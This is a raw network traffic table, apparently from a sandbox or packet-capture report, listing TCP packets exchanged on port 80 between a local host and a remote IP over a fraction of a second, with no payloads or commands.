                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.486063957 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.486104012 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.486164093 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.486665010 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.486731052 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.486742020 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.486792088 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.488347054 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.488406897 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.488477945 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.488531113 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.490046978 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.490104914 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.490108967 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.490154028 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.491678953 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.491741896 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.491813898 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.491872072 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.493314028 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.493372917 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.493438959 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.493494987 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.494940996 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.495002031 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.495073080 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.495131969 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.496570110 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.496629953 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.496766090 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.496819019 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.498123884 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.498183966 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.498222113 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.498275995 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.499649048 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.499710083 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.499726057 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.499790907 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.501256943 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.501315117 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.501327991 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.501385927 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.502810955 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.502870083 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.502882957 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.502935886 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.504266977 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.504328012 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.504400015 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.504455090 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.505857944 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.505896091 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.505913973 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.505964994 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.507287979 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.507421970 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.507488966 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.507544994 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.508748055 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.508802891 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.508862019 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.508917093 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.510227919 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.510288000 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.510349989 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.510401011 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.511691093 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.511758089 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.511810064 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.511868000 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.513129950 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.513190985 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.513245106 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.513303041 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.514597893 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.514657974 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.514755011 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.514806032 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.515993118 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.516053915 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.516113997 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.516168118 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.517481089 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.517541885 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.517580032 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.517637968 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.518841982 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.518899918 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.518965006 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.519033909 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.520226002 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.520278931 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.520404100 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.520462036 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.521605015 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.521657944 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.521658897 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.521711111 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.522984982 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.523046017 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.523103952 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.523159027 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.524344921 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.524399996 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.524471045 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.524525881 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.525757074 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.525816917 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.525912046 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.525964975 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.527101994 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.527157068 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.527190924 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.527246952 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.528448105 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.528508902 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.528553963 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.528608084 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.529756069 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.529807091 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.529871941 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.529937983 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.531089067 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.531222105 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.531302929 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.532453060 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.532500982 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.532500982 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.532565117 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.532622099 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.533762932 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.533821106 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.533891916 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.533946037 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.535073996 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.535130024 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.535207987 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.535263062 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.536413908 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.536473989 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.536732912 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.536793947 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.537729979 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.537787914 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.537844896 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.537900925 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.539042950 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.539146900 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.539232016 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.539294004 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.541384935 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.541445017 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.541513920 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.541568041 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.541635990 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.541692972 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.541747093 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.541801929 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.542979956 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.543040037 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.543109894 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.543165922 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.544328928 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.544389009 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.544456959 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.544511080 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.545614958 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.545670033 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.545727968 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.545783043 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.546924114 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.546986103 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.547044992 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.547113895 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.548244953 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.548300982 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.548365116 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.548419952 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.549535036 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.549643993 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.549686909 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.549742937 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.550868988 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.550923109 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.551007032 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.551064014 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.552195072 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.552253962 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.552304029 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.552359104 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.553503990 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.553560972 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.553621054 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.553678036 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.554800034 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.554872990 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.554924011 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.554985046 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.556173086 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.556232929 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.556286097 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.556354046 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.557415009 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.557472944 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.557522058 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.557578087 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.558772087 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.558830976 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.558890104 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.558945894 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.560020924 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.560079098 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.677990913 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.678117037 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.678196907 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.678257942 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.678523064 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.678592920 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.678649902 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.678705931 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.679447889 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.679502010 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.679502964 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.679555893 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.680429935 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.680488110 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.680532932 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.680584908 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.681394100 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.681452036 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.681513071 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.681571960 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.682385921 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.682442904 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.682477951 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.682533026 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.683373928 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.683430910 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.683478117 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.683532953 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.684340954 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.684398890 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.684447050 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.684524059 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.685298920 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.685355902 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.685421944 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.685482025 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.686274052 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.686342955 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.686394930 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.686453104 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.687247992 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.687309980 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.687408924 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.687469959 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.688272953 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.688371897 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.688380003 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.688441038 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.689177036 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.689238071 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.689305067 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.689373016 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.690162897 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.690220118 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.690294027 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.690355062 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.691139936 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.691198111 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.691256046 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.691329956 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.692110062 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.692162991 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.692172050 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:12.692212105 CET4976380192.168.2.431.41.244.11
